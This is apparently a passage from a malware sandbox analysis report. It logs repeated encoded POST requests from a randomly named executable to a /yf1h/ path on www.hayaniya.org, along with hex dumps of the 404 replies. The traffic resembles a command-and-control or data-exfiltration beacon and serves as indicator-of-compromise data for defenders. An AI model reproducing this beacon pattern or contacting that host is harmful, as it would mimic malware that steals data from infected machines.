                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 72 68 67 6f 58 36 71 57 44 53 61 68 6a 4c 34 76 69 41 5a 57 73 63 2b 48 48 34 41 6b 73 6b 36 55 66 79 67 33 4c 61 30 49 41 31 49 6d 53 54 56 6a 4e 4e 2b 31 4d 75 4c 69 6d 53 44 64 77 65 69 6b 67 43 2b 37 53 61 2f 61 73 4e 71 4d 4b 44 47 47 4e 44 76 59 46 6f 44 6c 43 70 4f 61 7a 2f 58 6b 6e 30 2b 38 62 4d 59 7a 33 46 76 67 6e 72 46 33 43 59 36 55 4a 56 74 4e 30 77 2f 32 6a 55 4f 7a 6d 75 73 4e 7a 76 34 30 54 78 46 45 63 79 76 65 31 5a 6e 65 76 37 76 72 72 65 4f 36 63 69 53 79 63 79 64 38 31 78 36 79 4f 67 56 61 6c 62 71 76 6d 4e 7a 6d 32 77 3d 3d
                                                                Data Ascii: Ebfx6=VXBo7Mv86w/xrhgoX6qWDSahjL4viAZWsc+HH4Aksk6Ufyg3La0IA1ImSTVjNN+1MuLimSDdweikgC+7Sa/asNqMKDGGNDvYFoDlCpOaz/Xkn0+8bMYz3FvgnrF3CY6UJVtN0w/2jUOzmusNzv40TxFEcyve1Znev7vrreO6ciSycyd81x6yOgValbqvmNzm2w==
                                                                Dec 9, 2024 08:44:06.860871077 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:06 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                Dec 9, 2024 08:44:06.860959053 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                Dec 9, 2024 08:44:06.860970974 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                Dec 9, 2024 08:44:06.861422062 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                Dec 9, 2024 08:44:06.861435890 CET1236INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                                Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                                Dec 9, 2024 08:44:06.861577034 CET1236INData Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                                Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                                Dec 9, 2024 08:44:06.862358093 CET1236INData Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                                Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                                Dec 9, 2024 08:44:06.862489939 CET1236INData Raw: e1 ee d1 d2 5c a9 cf 4f 45 1d fd 38 5b 8a 1b 2e bc 79 c6 8c 6a 4c 39 91 46 d5 c7 92 90 23 1f 47 08 34 48 b8 4b dc b2 cb b6 26 59 c1 6a 07 d4 6a 36 d7 c4 b1 91 b6 5d 1b 5d cf f1 5a 03 5c 21 7b d5 b3 4a b6 6e ac 77 ac df 70 4a 5d 9f 28 34 95 38 aa
                                                                Data Ascii: \OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJf;0>b+gXfXQoV;"r#mFTmHmN2[XTS@=*B1Qr}%AV[8s*(H.`{L=>-&0@O?hnV
                                                                Dec 9, 2024 08:44:06.862500906 CET1236INData Raw: 6c fe 64 c9 d2 d8 4a 58 f6 cd ed 2b 10 a6 f0 a9 e0 22 9c 6d f2 e5 60 45 7c 21 ab 91 4e 6f 30 b8 8c b4 b2 ac a2 56 bb 5b 61 af c2 42 21 a8 82 c2 3a 16 16 d2 f9 2b 30 f0 0a d0 ae eb a5 02 fc 0a 60 9d 24 56 22 ac 81 ba ee 0f 70 8c 9c 80 32 57 12 5e
                                                                Data Ascii: ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&UuyWuV8/VuNf]u.(|hUeL_?;m6!vZrPN
                                                                Dec 9, 2024 08:44:06.863358974 CET1236INData Raw: af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6 7f 4a bf cf a4 77 8b f4 76 87 3f 12 bb 6b 24 3a cb 24 7b 54 55 e4 46 6a 11 ee 95 6a 5f d8 6f 21 e1 6d ac
                                                                Data Ascii: :BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8"*4\J5PJ+A
                                                                Dec 9, 2024 08:44:06.980473995 CET1236INData Raw: 48 df cc 1f cd 9f cd 9f a4 e7 19 98 9d ec 76 45 db 38 b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d
                                                                Data Ascii: HvE8`7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.1249739192.185.147.100801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:08.082433939 CET810OUTPOST /yf1h/ HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 52 53 55 66 54 51 33 4d 59 4d 49 4e 56 49 6d 47 44 56 69 44 74 2b 41 4d 75 47 64 6d 54 2f 64 77 65 6d 6b 67 48 61 37 54 70 6e 5a 73 64 71 4f 4c 7a 47 45 54 7a 76 59 46 6f 44 6c 43 70 79 38 7a 2f 50 6b 6b 47 71 38 5a 75 38 77 30 46 76 6a 6b 72 46 33 56 6f 36 51 4a 56 74 2f 30 78 69 74 6a 53 4b 7a 6d 73 6b 4e 32 75 34 33 45 68 46 4f 59 79 75 75 6c 5a 7a 56 6d 6f 6e 32 75 49 4f 44 58 47 53 39 64 30 51 6d 71 44 79 6b 62 6a 42 58 6f 4d 54 66 72 4f 4f 76 74 35 33 47 4e 50 56 67 59 51 42 45 69 70 77 56 59 34 30 36 31 41 30 3d
                                                                Data Ascii: Ebfx6=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjBXoMTfrOOvt53GNPVgYQBEipwVY4061A0=
                                                                Dec 9, 2024 08:44:09.487921000 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:09 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                Dec 9, 2024 08:44:09.488002062 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                Dec 9, 2024 08:44:09.488014936 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                Dec 9, 2024 08:44:09.488626957 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                Dec 9, 2024 08:44:09.488637924 CET1236INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                                Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                                Dec 9, 2024 08:44:09.488648891 CET1236INData Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                                Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                                Dec 9, 2024 08:44:09.489485025 CET1236INData Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                                Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                                Dec 9, 2024 08:44:09.489502907 CET1236INData Raw: e1 ee d1 d2 5c a9 cf 4f 45 1d fd 38 5b 8a 1b 2e bc 79 c6 8c 6a 4c 39 91 46 d5 c7 92 90 23 1f 47 08 34 48 b8 4b dc b2 cb b6 26 59 c1 6a 07 d4 6a 36 d7 c4 b1 91 b6 5d 1b 5d cf f1 5a 03 5c 21 7b d5 b3 4a b6 6e ac 77 ac df 70 4a 5d 9f 28 34 95 38 aa
                                                                Data Ascii: \OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJf;0>b+gXfXQoV;"r#mFTmHmN2[XTS@=*B1Qr}%AV[8s*(H.`{L=>-&0@O?hnV
                                                                Dec 9, 2024 08:44:09.489512920 CET1236INData Raw: 6c fe 64 c9 d2 d8 4a 58 f6 cd ed 2b 10 a6 f0 a9 e0 22 9c 6d f2 e5 60 45 7c 21 ab 91 4e 6f 30 b8 8c b4 b2 ac a2 56 bb 5b 61 af c2 42 21 a8 82 c2 3a 16 16 d2 f9 2b 30 f0 0a d0 ae eb a5 02 fc 0a 60 9d 24 56 22 ac 81 ba ee 0f 70 8c 9c 80 32 57 12 5e
                                                                Data Ascii: ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&UuyWuV8/VuNf]u.(|hUeL_?;m6!vZrPN
                                                                Dec 9, 2024 08:44:09.490272045 CET1236INData Raw: af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6 7f 4a bf cf a4 77 8b f4 76 87 3f 12 bb 6b 24 3a cb 24 7b 54 55 e4 46 6a 11 ee 95 6a 5f d8 6f 21 e1 6d ac
                                                                Data Ascii: :BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8"*4\J5PJ+A
                                                                Dec 9, 2024 08:44:09.607628107 CET1236INData Raw: 48 df cc 1f cd 9f cd 9f a4 e7 19 98 9d ec 76 45 db 38 b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d
                                                                Data Ascii: HvE8`7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.1249740192.185.147.100801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:10.745417118 CET1823OUTPOST /yf1h/ HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 58 4b 55 63 68 6f 33 4b 35 4d 49 4d 56 49 6d 46 44 56 6e 44 74 2b 64 4d 75 75 5a 6d 54 79 2f 77 63 75 6b 68 6c 53 37 62 38 54 5a 2f 39 71 4f 41 54 47 4a 4e 44 75 46 46 6f 54 70 43 70 43 38 7a 2f 50 6b 6b 48 61 38 64 38 59 77 37 6c 76 67 6e 72 46 37 43 59 36 34 4a 56 45 4b 30 78 6e 59 67 69 71 7a 6d 4d 55 4e 30 39 51 33 62 52 46 41 56 53 75 32 6c 5a 75 4e 6d 6f 4c 36 75 49 53 6c 58 42 65 39 65 42 41 78 36 68 75 68 41 78 64 4b 74 64 47 77 67 74 79 31 76 61 71 37 65 4a 35 47 53 77 4e 72 76 72 70 76 43 4b 67 45 75 56 73 69 70 74 34 39 37 70 31 44 42 43 68 42 63 4b 44 65 4e 49 76 30 56 31 34 6f 64 79 54 63 67 69 6f 78 42 76 77 4a 34 2f 4f 4a 2b 4b 36 42 53 4b 75 75 6a 49 41 74 32 49 69 2f 55 41 6f 51 56 65 59 37 53 78 4a 68 64 38 2f 67 4d 4a 76 6b 75 46 4d 7a 7a 51 6b 4e 50 4b 70 64 6d 66 58 6f 69 38 5a 34 70 53 73 50 6b 35 4f 30 44 59 6a 48 70 4e 32 65 6f 51 47 73 [TRUNCATED]
                                                                Data Ascii: Ebfx6=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvXKUcho3K5MIMVImFDVnDt+dMuuZmTy/wcukhlS7b8TZ/9qOATGJNDuFFoTpCpC8z/PkkHa8d8Yw7lvgnrF7CY64JVEK0xnYgiqzmMUN09Q3bRFAVSu2lZuNmoL6uISlXBe9eBAx6huhAxdKtdGwgty1vaq7eJ5GSwNrvrpvCKgEuVsipt497p1DBChBcKDeNIv0V14odyTcgioxBvwJ4/OJ+K6BSKuujIAt2Ii/UAoQVeY7SxJhd8/gMJvkuFMzzQkNPKpdmfXoi8Z4pSsPk5O0DYjHpN2eoQGsBuE+0lba0HSXIupUouCIbDqqxPMPQVoO27261vvxwGr/9ELU2ztWrf3UvwnT2r8ypnA63vdNd2qzgZjBToHy4G06mLOrFz9taxrGvy2vaoRBzwqWNmrjaxb12vs1PQD158WNp6QwHF74HTf8p53Wl+76sesbhyx8FePHLdCtIDt4f5fAG0HyLfxsDuMpYBOuIszXIUjyZTB7kHVAHY3izoHekIk1ie24zhvr5jZn1y0o9fnvdooSt9ut+5uqRcC9oHnzO0NtglbW5wkENMUru/Rfw9LVJ+NXWPPas3OzRVX/fp4tPacxgUJ7gsIGkAuHgK25SYMKvL3uRGHnhNB4qACRrdrursRt4yjWorqAkfgNS9QUbhK+eP9TYs8NazzqCeHa1lmzob8SN39QjV2cqSO+tFmLwgjxGOv67fiLjyRrx4NPhe8HJ3Vc+vavtjkP9gB3KTPHlvl7YShaZeoOyv7wdmXUE//P2SXN19rHKAZpzLA9dkWbGpsSmT4DhrNcG0yaJYeF+2brsKhlbFrB8DZ9Vs1+saIYDD1852MjkDW4yENzYbcayo0CCyazIANc9QOJ8OVXO44ecVF1jQe4XyI9C0itAQQ5yBJPcuSUAI7CSzsew3aWyqXfvmUT6HB/Ws92csPyrQ5gZqIKXTN62fM11OzYeBOg2+ [TRUNCATED]
                                                                Dec 9, 2024 08:44:12.232300043 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:11 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
